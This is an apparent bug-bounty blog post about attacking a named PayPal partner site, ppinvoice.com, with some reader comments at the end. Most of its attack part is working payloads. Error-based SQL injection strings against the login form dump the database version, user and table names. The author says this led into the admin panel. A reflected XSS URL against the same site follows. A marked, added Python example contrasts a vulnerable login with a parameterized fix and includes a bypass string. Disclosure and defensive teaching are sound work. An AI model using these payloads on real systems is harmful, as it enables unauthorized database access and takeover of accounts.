One of the PayPal Partner websites, http://ppinvoice.com/, was suffering from a POST SQL injection. Union injection was impossible here.
LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23 &LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
As we cannot continue with the above error, double query (error-based) injection works perfectly.
LoginForm[email]=1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(), user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or 1%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
However, dumping the database was quite easy since there were no WAFs or any kind of filtering happening. Out of the tables, let's check out the admin table.
LoginForm[email]=1' or (@:=1)||@ group by concat((select substr(group_concat(' :: ',table_name),1,450) from information_schema.tables WHERE table_schema=database()),@:=@-1)having @||min(@:=0)%23&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
So finally I was able to log into their admin panel 😉
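The root cause behind every payload above is the same: the value of LoginForm[email] is concatenated straight into the login query, so the quote closes the string literal and the rest of the input becomes SQL. The following is an added example, not code from the post or from the ppinvoice.com application; it uses an in-memory SQLite table with a made-up name (tbl_user) and made-up credentials to show the vulnerable pattern beside its parameterized fix, and why a generic error message matters (the error-based payloads above only work because the raw database error reaches the response). SQLite uses `-- ` rather than MySQL's `#` for comments, which is the only change to the injection shape.

```python
import sqlite3

# Constructed sample data: one admin row in an in-memory database.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbl_user (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    conn.execute(
        "INSERT INTO tbl_user (email, password, role) VALUES (?, ?, ?)",
        ("admin@example.test", "correct-horse-battery", "admin"),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """The pattern the post exploits: untrusted input spliced into the SQL text.

    Returns the role on success, None on failure, and re-raises database
    errors verbatim, which is what lets error-based injection leak data.
    """
    sql = (
        "SELECT role FROM tbl_user WHERE email = '%s' AND password = '%s'"
        % (email, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Hardened form: bound parameters, and database errors never reach the user.

    The driver sends the query text and the values separately, so a quote in
    the e-mail field is just a byte in a string, never a syntax element.
    """
    try:
        row = conn.execute(
            "SELECT role FROM tbl_user WHERE email = ? AND password = ?",
            (email, password),
        ).fetchone()
    except sqlite3.Error:
        # Log the real error server-side; the client only sees a generic failure.
        return None
    return row[0] if row else None


# Same shape as the post's "1' or 1 ... #" payload, with SQLite comment syntax.
BYPASS_EMAIL = "1' or 1 -- "

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_EMAIL, "anything"))  # admin
    print("safe:      ", login_safe(db, BYPASS_EMAIL, "anything"))        # None
```

In a real application the password column would hold a salted hash and the comparison would happen in code, not in the query; the example keeps plaintext only to keep the injection mechanics visible.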
That's not all: there is also a reflected XSS.
http://ppinvoice.com/index.php/faq/faqlist?id=4"><svg/onload="prompt('Hello There')">
The copyright notice also mentions Cisco.
However, I reported this to PayPal and they said it's out of scope. Well, I recently saw that another researcher who had found some issues in another PayPal Partner website running SILK software was accepted while mine was not. The issue seems to be in SILK software. It seems like they are a third party to PayPal. They are also a Magento Solution Provider according to their webpage.
You always make awesome things. Great bro, keep on hunting.
Sweet stuff bro, awesome as always.